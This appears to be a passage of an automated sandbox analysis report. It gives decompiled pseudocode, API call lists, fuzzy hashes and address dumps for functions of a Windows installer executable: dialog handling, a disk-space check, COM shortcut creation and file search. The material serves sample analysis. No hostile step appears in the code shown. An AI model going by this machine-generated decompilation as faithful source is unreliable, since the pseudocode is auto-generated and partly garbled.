                                                                                • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
                                                                              • GetDiskFreeSpaceA.KERNEL32(0079E550,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,0079E550,0079E550,?,?,000003FB,?), ref: 00404414
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040442A
                                                                              • SetDlgItemTextA.USER32 ref: 0040447E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$BrowseDiskFolderFreePrevSpaceWindowlstrcatlstrcmpi
                                                                              • String ID: A$GetDiskFreeSpaceExA$KERNEL32.dll$Py$SHAutoComplete$shlwapi.dll
                                                                              • API String ID: 2007447535-1909522251
                                                                              • Opcode ID: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                              • Instruction ID: ef859d302125b71f7b9a0a5e3096057e4f4c42b01edd6451a005236750c2ec27
                                                                              • Opcode Fuzzy Hash: fa85b854a19c834815a7f5dd914cc43de4103a60353febe687952c11a8408a20
                                                                              • Instruction Fuzzy Hash: 0D819BB1900218BBDB11AFA1DC45BAF7BB8EF84314F00417AFA04B62D1D77C9A418B69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 74%
                                                                              			E004020A6(void* __eflags) {
                                                                              				void* _t44;
                                                                              				intOrPtr* _t48;
                                                                              				intOrPtr* _t50;
                                                                              				intOrPtr* _t52;
                                                                              				intOrPtr* _t54;
                                                                              				signed int _t58;
                                                                              				intOrPtr* _t59;
                                                                              				intOrPtr* _t62;
                                                                              				intOrPtr* _t64;
                                                                              				intOrPtr* _t66;
                                                                              				intOrPtr* _t69;
                                                                              				intOrPtr* _t71;
                                                                              				int _t75;
                                                                              				signed int _t81;
                                                                              				intOrPtr* _t88;
                                                                              				void* _t95;
                                                                              				void* _t96;
                                                                              				void* _t100;
                                                                              
                                                                              				 *(_t100 - 0x30) = E00402A9A(0xfffffff0);
                                                                              				_t96 = E00402A9A(0xffffffdf);
                                                                              				 *((intOrPtr*)(_t100 - 0x2c)) = E00402A9A(2);
                                                                              				 *((intOrPtr*)(_t100 - 0x34)) = E00402A9A(0xffffffcd);
                                                                              				 *((intOrPtr*)(_t100 - 0x44)) = E00402A9A(0x45);
                                                                              				if(E00405538(_t96) == 0) {
                                                                              					E00402A9A(0x21);
                                                                              				}
                                                                              				_t44 = _t100 + 8;
                                                                              				__imp__CoCreateInstance(0x407324, _t75, 1, 0x407314, _t44);
                                                                              				if(_t44 < _t75) {
                                                                              					L12:
                                                                              					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                              					_push(0xfffffff0);
                                                                              				} else {
                                                                              					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                              					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407334, _t100 - 8);
                                                                              					if(_t95 >= _t75) {
                                                                              						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                              						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                              						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                              						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
                                                                              						_t81 =  *(_t100 - 0x14);
                                                                              						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                              						if(_t58 != 0) {
                                                                              							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                              							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                              							_t81 =  *(_t100 - 0x14);
                                                                              						}
                                                                              						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                              						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                              						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0x34)))) != _t75) {
                                                                              							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                              							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0x34)),  *(_t100 - 0x14) & 0x000000ff);
                                                                              						}
                                                                              						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                              						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                                                                              						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                              						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                                                                              						if(_t95 >= _t75) {
                                                                              							 *0x409418 = _t75;
                                                                              							MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409418, 0x400);
                                                                              							_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                              							_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409418, 1);
                                                                              						}
                                                                              						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                              						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                              					}
                                                                              					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                              					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                              					if(_t95 >= _t75) {
                                                                              						_push(0xfffffff4);
                                                                              					} else {
                                                                              						goto L12;
                                                                              					}
                                                                              				}
                                                                              				E00401428();
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t100 - 4));
                                                                              				return 0;
                                                                              			}


                                                                              APIs
                                                                              • CoCreateInstance.OLE32(00407324,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020F9
                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409418,00000400,?,00000001,00407314,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021B5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00402131
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                              • API String ID: 123533781-501415292
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 39%
                                                                              			E004026BC(char __ebx, CHAR* __edi, char* __esi) {
                                                                              				void* _t19;
                                                                              
                                                                              				if(FindFirstFileA(E00402A9A(2), _t19 - 0x1a4) != 0xffffffff) {
                                                                              					E0040591D(__edi, _t6);
                                                                              					_push(_t19 - 0x178);
                                                                              					_push(__esi);
                                                                              					E004059BF();
                                                                              				} else {
                                                                              					 *((char*)(__edi)) = __ebx;
                                                                              					 *__esi = __ebx;
                                                                              					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                              				}
                                                                              				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t19 - 4));
                                                                              				return 0;
                                                                              			}


                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004026CB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220733017.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 77%
                                                                              			E004038BF(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                              				void* _v84;
                                                                              				void* _v88;
                                                                              				void* __ebx;
                                                                              				void* __edi;
                                                                              				void* __esi;
                                                                              				signed int _t33;
                                                                              				signed int _t35;
                                                                              				struct HWND__* _t37;
                                                                              				struct HWND__* _t47;
                                                                              				struct HWND__* _t65;
                                                                              				struct HWND__* _t71;
                                                                              				struct HWND__* _t84;
                                                                              				struct HWND__* _t89;
                                                                              				struct HWND__* _t97;
                                                                              				int _t101;
                                                                              				int _t104;
                                                                              				struct HWND__* _t117;
                                                                              				struct HWND__* _t120;
                                                                              				signed int _t122;
                                                                              				struct HWND__* _t127;
                                                                              				long _t132;
                                                                              				int _t134;
                                                                              				int _t135;
                                                                              				struct HWND__* _t136;
                                                                              				void* _t139;
                                                                              
                                                                              				_t135 = _a8;
                                                                              				if(_t135 == 0x110 || _t135 == 0x408) {
                                                                              					_t33 = _a12;
                                                                              					_t117 = _a4;
                                                                              					__eflags = _t135 - 0x110;
                                                                              					 *0x79f56c = _t33;
                                                                              					if(_t135 == 0x110) {
                                                                              						 *0x7a2f84 = _t117;
                                                                              						 *0x79f57c = GetDlgItem(_t117, 1);
                                                                              						_t89 = GetDlgItem(_t117, 2);
                                                                              						_push(0xffffffff);
                                                                              						_push(0x1c);
                                                                              						 *0x79e548 = _t89;
                                                                              						E00403DA7(_t117);
                                                                              						SetClassLongA(_t117, 0xfffffff2,  *0x7a2768);
                                                                              						 *0x7a274c = E00401410(4);
                                                                              						_t33 = 1;
                                                                              						__eflags = 1;
                                                                              						 *0x79f56c = 1;
                                                                              					}
                                                                              					_t120 =  *0x409284; // 0xffffffff
                                                                              					_t132 = (_t120 << 6) +  *0x7a2fa0;
                                                                              					__eflags = _t120;
                                                                              					if(_t120 < 0) {
                                                                              						L38:
                                                                              						E00403DF3(0x40b);
                                                                              						while(1) {
                                                                              							_t35 =  *0x79f56c;
                                                                              							 *0x409284 =  *0x409284 + _t35;
                                                                              							_t132 = _t132 + (_t35 << 6);
                                                                              							_t37 =  *0x409284; // 0xffffffff
                                                                              							__eflags = _t37 -  *0x7a2fa4;
                                                                              							if(_t37 ==  *0x7a2fa4) {
                                                                              								E00401410(1);
                                                                              							}
                                                                              							__eflags =  *0x7a274c;
                                                                              							if( *0x7a274c != 0) {
                                                                              								break;
                                                                              							}
                                                                              							__eflags =  *0x409284 -  *0x7a2fa4; // 0xffffffff
                                                                              							if(__eflags >= 0) {
                                                                              								break;
                                                                              							}
                                                                              							_push( *((intOrPtr*)(_t132 + 0x24)));
                                                                              							_t122 =  *(_t132 + 0x14);
                                                                              							_push(0x7ab000);
                                                                              							E004059E1(_t117, _t122, _t132);
                                                                              							_push( *((intOrPtr*)(_t132 + 0x20)));
                                                                              							_push(0xfffffc19);
                                                                              							E00403DA7(_t117);
                                                                              							_push( *((intOrPtr*)(_t132 + 0x1c)));
                                                                              							_push(0xfffffc1b);
                                                                              							E00403DA7(_t117);
                                                                              							_push( *((intOrPtr*)(_t132 + 0x28)));
                                                                              							_push(0xfffffc1a);
                                                                              							E00403DA7(_t117);
                                                                              							_t47 = GetDlgItem(_t117, 3);
                                                                              							__eflags =  *0x7a300c;
                                                                              							_t136 = _t47;
                                                                              							if( *0x7a300c != 0) {
                                                                              								_t122 = _t122 & 0x0000fefd | 0x00000004;
                                                                              								__eflags = _t122;
                                                                              							}
                                                                              							ShowWindow(_t136, _t122 & 0x00000008);
                                                                              							EnableWindow(_t136, _t122 & 0x00000100);
                                                                              							E00403DC9(_t122 & 0x00000002);
                                                                              							EnableWindow( *0x79e548, _t122 & 0x00000004);
                                                                              							SendMessageA(_t136, 0xf4, 0, 1);
                                                                              							__eflags =  *0x7a300c;
                                                                              							if( *0x7a300c == 0) {
                                                                              								_push( *0x79f57c);
                                                                              							} else {
                                                                              								SendMessageA(_t117, 0x401, 2, 0);
                                                                              								_push( *0x79e548);
                                                                              							}
                                                                              							E00403DDC();
                                                                              							E004059BF(0x79f580, 0x7a2780);
                                                                              							_push( *((intOrPtr*)(_t132 + 0x18)));
                                                                              							_push( &(0x79f580[lstrlenA(0x79f580)]));
                                                                              							E004059E1(_t117, 0, _t132);
                                                                              							SetWindowTextA(_t117, 0x79f580);
                                                                              							_push(0);
                                                                              							_t65 = E0040136D( *((intOrPtr*)(_t132 + 8)));
                                                                              							__eflags = _t65;
                                                                              							if(_t65 != 0) {
                                                                              								continue;
                                                                              							} else {
                                                                              								__eflags =  *_t132 - _t65;
                                                                              								if( *_t132 == _t65) {
                                                                              									continue;
                                                                              								}
                                                                              								__eflags =  *(_t132 + 4) - 5;
                                                                              								if( *(_t132 + 4) != 5) {
                                                                              									DestroyWindow( *0x7a2758);
                                                                              									 *0x79ed58 = _t132;
                                                                              									__eflags =  *_t132;
                                                                              									if( *_t132 > 0) {
                                                                              										_t71 = CreateDialogParamA( *0x7a2f80,  *_t132 +  *0x7a2760 & 0x0000ffff, _t117,  *(0x409288 +  *(_t132 + 4) * 4), _t132);
                                                                              										__eflags = _t71;
                                                                              										 *0x7a2758 = _t71;
                                                                              										if(_t71 != 0) {
                                                                              											_push( *((intOrPtr*)(_t132 + 0x2c)));
                                                                              											_push(6);
                                                                              											E00403DA7(_t71);
                                                                              											GetWindowRect(GetDlgItem(_t117, 0x3fa), _t139 + 0x10);
                                                                              											ScreenToClient(_t117, _t139 + 0x10);
                                                                              											SetWindowPos( *0x7a2758, 0,  *(_t139 + 0x20),  *(_t139 + 0x20), 0, 0, 0x15);
                                                                              											_push(0);
                                                                              											E0040136D( *((intOrPtr*)(_t132 + 0xc)));
                                                                              											ShowWindow( *0x7a2758, 8);
                                                                              											E00403DF3(0x405);
                                                                              										}
                                                                              									}
                                                                              									goto L58;
                                                                              								}
                                                                              								__eflags =  *0x7a300c - _t65;
                                                                              								if( *0x7a300c != _t65) {
                                                                              									goto L61;
                                                                              								}
                                                                              								__eflags =  *0x7a3000 - _t65;
                                                                              								if( *0x7a3000 != _t65) {
                                                                              									continue;
                                                                              								}
                                                                              								goto L61;
                                                                              							}
                                                                              						}
                                                                              						DestroyWindow( *0x7a2758);
                                                                              						 *0x7a2f84 =  *0x7a2f84 & 0x00000000;
                                                                              						__eflags =  *0x7a2f84;
                                                                              						EndDialog(_t117,  *0x79e950);
                                                                              						goto L58;
                                                                              					} else {
                                                                              						__eflags = _t33 - 1;
                                                                              						if(_t33 != 1) {
                                                                              							L37:
                                                                              							__eflags =  *_t132;
                                                                              							if( *_t132 == 0) {
                                                                              								goto L61;
                                                                              							}
                                                                              							goto L38;
                                                                              						}
                                                                              						_push(0);
                                                                              						_t84 = E0040136D( *((intOrPtr*)(_t132 + 0x10)));
                                                                              						__eflags = _t84;
                                                                              						if(_t84 == 0) {
                                                                              							goto L37;
                                                                              						}
                                                                              						SendMessageA( *0x7a2758, 0x40f, 0, 1);
                                                                              						__eflags =  *0x7a274c;
                                                                              						return 0 |  *0x7a274c == 0x00000000;
                                                                              					}
                                                                              				} else {
                                                                              					_t117 = _a4;
                                                                              					if(_t135 == 0x47) {
                                                                              						SetWindowPos( *0x79f560, _t117, 0, 0, 0, 0, 0x13);
                                                                              					}
                                                                              					if(_t135 == 5) {
                                                                              						asm("sbb eax, eax");
                                                                              						ShowWindow( *0x79f560,  ~(_a12 - 1) & _t135);
                                                                              					}
                                                                              					if(_t135 != 0x40d) {
                                                                              						__eflags = _t135 - 0x11;
                                                                              						if(_t135 != 0x11) {
                                                                              							__eflags = _t135 - 0x10;
                                                                              							if(_t135 != 0x10) {
                                                                              								L14:
                                                                              								__eflags = _t135 - 0x111;
                                                                              								if(_t135 != 0x111) {
                                                                              									L30:
                                                                              									return E00403E0E(_t135, _a12, _a16);
                                                                              								}
                                                                              								_t134 = _a12 & 0x0000ffff;
                                                                              								_t127 = GetDlgItem(_t117, _t134);
                                                                              								__eflags = _t127;
                                                                              								if(_t127 == 0) {
                                                                              									L17:
                                                                              									__eflags = _t134 - 1;
                                                                              									if(_t134 != 1) {
                                                                              										__eflags = _t134 - 3;
                                                                              										if(_t134 != 3) {
                                                                              											__eflags = _t134 - 2;
                                                                              											if(_t134 != 2) {
                                                                              												L29:
                                                                              												SendMessageA( *0x7a2758, 0x111, _a12, _a16);
                                                                              												goto L30;
                                                                              											}
                                                                              											__eflags =  *0x7a300c;
                                                                              											if( *0x7a300c == 0) {
                                                                              												_t97 = E00401410(3);
                                                                              												__eflags = _t97;
                                                                              												if(_t97 != 0) {
                                                                              													goto L30;
                                                                              												}
                                                                              												 *0x79e950 = 1;
                                                                              												L25:
                                                                              												_push(0x78);
                                                                              												L26:
                                                                              												E00403D80();
                                                                              												goto L30;
                                                                              											}
                                                                              											E00401410(_t134);
                                                                              											 *0x79e950 = _t134;
                                                                              											goto L25;
                                                                              										}
                                                                              										__eflags =  *0x409284;
                                                                              										if( *0x409284 <= 0) {
                                                                              											goto L29;
                                                                              										}
                                                                              										_push(0xffffffff);
                                                                              										goto L26;
                                                                              									}
                                                                              									_push(1);
                                                                              									goto L26;
                                                                              								}
                                                                              								SendMessageA(_t127, 0xf3, 0, 0);
                                                                              								_t101 = IsWindowEnabled(_t127);
                                                                              								__eflags = _t101;
                                                                              								if(_t101 == 0) {
                                                                              									goto L61;
                                                                              								}
                                                                              								goto L17;
                                                                              							}
                                                                              							__eflags =  *0x409284 -  *0x7a2fa4 - 1; // 0xffffffff
                                                                              							if(__eflags != 0) {
                                                                              								goto L30;
                                                                              							}
                                                                              							_t104 = IsWindowEnabled( *0x79e548);
                                                                              							__eflags = _t104;
                                                                              							if(_t104 != 0) {
                                                                              								goto L30;
                                                                              							}
                                                                              							_t135 = 0x111;
                                                                              							_a12 = 1;
                                                                              							goto L14;
                                                                              						}
                                                                              						SetWindowLongA(_t117, 0, 0);
                                                                              						return 1;
                                                                              					} else {
                                                                              						DestroyWindow( *0x7a2758);
                                                                              						 *0x7a2758 = _a12;
                                                                              						L58:
                                                                              						if( *0x7a0580 == 0 &&  *0x7a2758 != 0) {
                                                                              							ShowWindow(_t117, 0xa);
                                                                              							 *0x7a0580 = 1;
                                                                              						}
                                                                              						L61:
                                                                              						return 0;
                                                                              					}
                                                                              				}
                                                                              			}

                                                                              0x0040399c
                                                                              0x004039af
                                                                              0x004039b1
                                                                              0x004039b3
                                                                              0x004039d0
                                                                              0x004039d3
                                                                              0x004039d5
                                                                              0x004039da
                                                                              0x004039dd
                                                                              0x004039ec
                                                                              0x004039ef
                                                                              0x00403a22
                                                                              0x00403a35
                                                                              0x00000000
                                                                              0x00403a35
                                                                              0x004039f1
                                                                              0x004039f8
                                                                              0x00403a11
                                                                              0x00403a16
                                                                              0x00403a18
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403a1a
                                                                              0x00403a06
                                                                              0x00403a06
                                                                              0x00403a08
                                                                              0x00403a08
                                                                              0x00000000
                                                                              0x00403a08
                                                                              0x004039fb
                                                                              0x00403a00
                                                                              0x00000000
                                                                              0x00403a00
                                                                              0x004039df
                                                                              0x004039e6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004039e8
                                                                              0x00000000
                                                                              0x004039e8
                                                                              0x004039d7
                                                                              0x00000000
                                                                              0x004039d7
                                                                              0x004039bf
                                                                              0x004039c2
                                                                              0x004039c8
                                                                              0x004039ca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004039ca
                                                                              0x00403963
                                                                              0x00403969
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403975
                                                                              0x0040397b
                                                                              0x0040397d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00403983
                                                                              0x00403988
                                                                              0x00000000
                                                                              0x00403988
                                                                              0x0040394a
                                                                              0x00000000
                                                                              0x00403926
                                                                              0x0040392c
                                                                              0x00403936
                                                                              0x00403d4f
                                                                              0x00403d56
                                                                              0x00403d64
                                                                              0x00403d6a
                                                                              0x00403d6a
                                                                              0x00403d74
                                                                              0x00000000
                                                                              0x00403d74
                                                                              0x00403924

                                                                              APIs
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004038FB
                                                                              • ShowWindow.USER32(?), ref: 00403918
                                                                              • DestroyWindow.USER32 ref: 0040392C
                                                                              • SetWindowLongA.USER32 ref: 0040394A
                                                                              • IsWindowEnabled.USER32 ref: 00403975
                                                                              • GetDlgItem.USER32 ref: 004039A3
                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 004039BF
                                                                              • IsWindowEnabled.USER32(00000000), ref: 004039C2
                                                                              • GetDlgItem.USER32 ref: 00403A6A
                                                                              • GetDlgItem.USER32 ref: 00403A74
                                                                              • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403A8E
                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403ADF
                                                                              • GetDlgItem.USER32 ref: 00403B86
                                                                              • ShowWindow.USER32(00000000,?), ref: 00403BA6
                                                                              • EnableWindow.USER32(00000000,?), ref: 00403BB5
                                                                              • EnableWindow.USER32(?,?), ref: 00403BD0
                                                                              • SendMessageA.USER32(00000000,000000F4,00000000,00000001), ref: 00403BE7
                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403BFA
                                                                              • lstrlenA.KERNEL32(0079F580,?,0079F580,007A2780), ref: 00403C23
                                                                              • SetWindowTextA.USER32(?,0079F580), ref: 00403C32
                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403D64
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.220415875.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.220412384.0000000000400000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220422380.0000000000407000.00000002.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220426851.0000000000409000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220459930.000000000077A000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220464420.0000000000784000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220468412.0000000000788000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220477387.0000000000795000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220487575.00000000007A1000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220490475.00000000007A9000.00000004.00020000.sdmp
                                                                              • Associated: 00000000.00000002.220493780.00000000007AC000.00000002.00020000.sdmp
                                                                              Similarity
                                                                              • API ID: Window$ItemMessageSend$Show$EnableEnabledLong$ClassDestroyTextlstrlen
                                                                              • String ID:
                                                                              • API String ID: 3950083612-0
                                                                              • Opcode ID: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                              • Instruction ID: 5dd3c4f218cf3e404d6a97a2e5ce8d1cdd0b8388a563f9de6f37f2f8e87629b5
                                                                              • Opcode Fuzzy Hash: fa4e3fe4f8128de32ab5ebeb5ac9453328a33fd8f116c2f1de342d397e391704
                                                                              • Instruction Fuzzy Hash: 9DC1CC70904200AFD720AF25ED45E277FADEB89706F00453AF641B52F2D67DAA42CB1D
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 92%
                                                                              			E00403EEF(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                                              				char* _v8;
                                                                              				signed int _v12;
                                                                              				void* _v16;
                                                                              				struct HWND__* _t52;
                                                                              				long _t86;
                                                                              				int _t98;
                                                                              				struct HWND__* _t99;
                                                                              				signed int _t100;
                                                                              				intOrPtr _t109;
                                                                              				int _t110;
                                                                              				signed int* _t112;
                                                                              				signed int _t113;
                                                                              				char* _t114;
                                                                              				CHAR* _t115;
                                                                              
                                                                              				if(_a8 != 0x110) {
                                                                              					if(_a8 != 0x111) {
                                                                              						L11:
                                                                              						if(_a8 != 0x4e) {
                                                                              							if(_a8 == 0x40b) {
                                                                              								 *0x79f568 =  *0x79f568 + 1;
                                                                              							}
                                                                              							L25:
                                                                              							_t110 = _a16;
                                                                              							L26:
                                                                              							return E00403E0E(_a8, _a12, _t110);
                                                                              						}
                                                                              						_t52 = GetDlgItem(_a4, 0x3e8);
                                                                              						_t110 = _a16;
                                                                              						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                                              							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                                              							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                                              							_v12 = _t100;
                                                                              							_v16 = _t109;
                                                                              							_v8 = 0x7a1f20;
                                                                              							if(_t100 - _t109 < 0x800) {
                                                                              								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                                              								SetCursor(LoadCursorA(0, 0x7f02));
                                                                              								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
                                                                              								SetCursor(LoadCursorA(0, 0x7f00));
                                                                              								_t110 = _a16;
                                                                              							}
                                                                              						}
                                                                              						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                                              							goto L26;
                                                                              						} else {
                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                                              								SendMessageA( *0x7a2f84, 0x111, 1, 0);
                                                                              							}
                                                                              							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                                              								SendMessageA( *0x7a2f84, 0x10, 0, 0);
                                                                              							}
                                                                              							return 1;
                                                                              						}
                                                                              					}
                                                                              					if(_a12 >> 0x10 != 0 ||  *0x79f568 != 0) {
                                                                              						goto L25;
                                                                              					} else {
                                                                              						_t112 =  *0x79ed58 + 0x14;
                                                                              						if(( *_t112 & 0x00000020) == 0) {
                                                                              							goto L25;
                                                                              						}
                                                                              						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                              						E00403DC9(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                              						E0040417A();
                                                                              						goto L11;
                                                                              					}
                                                                              				}
                                                                              				_t98 = _a16;
                                                                              				_t113 =  *(_t98 + 0x30);
                                                                              				if(_t113 < 0) {
                                                                              					_t113 =  *( *0x7a275c - 4 + _t113 * 4);
                                                                              				}
                                                                              				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                                              				_t114 = _t113 +  *0x7a2fb8;
                                                                              				_push(0x22);
                                                                              				_a16 =  *_t114;
                                                                              				_v12 = _v12 & 0x00000000;
                                                                              				_t115 = _t114 + 1;
                                                                              				_v16 = _t115;
                                                                              				_v8 = E00403EBB;
                                                                              				E00403DA7(_a4);
                                                                              				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                                              				_push(0x23);
                                                                              				E00403DA7(_a4);
                                                                              				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                              				E00403DC9( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                                              				_t99 = GetDlgItem(_a4, 0x3e8);
                                                                              				E00403DDC(_t99);
                                                                              				SendMessageA(_t99, 0x45b, 1, 0);
                                                                              				_t86 =  *( *0x7a2f88 + 0x68);
                                                                              				if(_t86 < 0) {
                                                                              					_t86 = GetSysColor( ~_t86);
                                                                              				}
                                                                              				SendMessageA(_t99, 0x443, 0, _t86);
                                                                              				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                                              				 *0x79e54c =  *0x79e54c & 0x00000000;
                                                                              				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                                              				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                                              				 *0x79f568 =  *0x79f568 & 0x00000000;
                                                                              				return 0;
                                                                              			}

                                                                              APIs
                                                                              • CheckDlgButton.USER32 ref: 00403F7A
                                                                              • GetDlgItem.USER32 ref: 00403F8E
                                                                              • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00403FAC
                                                                              • GetSysColor.USER32(?), ref: 00403FBD
                                                                              • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00403FCC
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00403FDB
                                                                              • lstrlenA.KERNEL32(?), ref: 00403FE5
                                                                              • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00403FF3
                                                                              • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404002
                                                                              • GetDlgItem.USER32 ref: 00404065
                                                                              • SendMessageA.USER32(00000000), ref: 00404068
                                                                              • GetDlgItem.USER32 ref: 00404093
